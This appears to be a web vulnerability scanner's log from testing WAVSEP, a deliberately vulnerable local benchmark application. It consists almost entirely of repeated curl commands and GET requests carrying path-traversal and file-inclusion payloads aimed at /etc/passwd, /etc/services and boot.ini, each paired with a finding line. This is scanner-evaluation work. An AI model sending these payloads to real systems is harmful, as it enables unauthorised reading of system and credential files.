curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
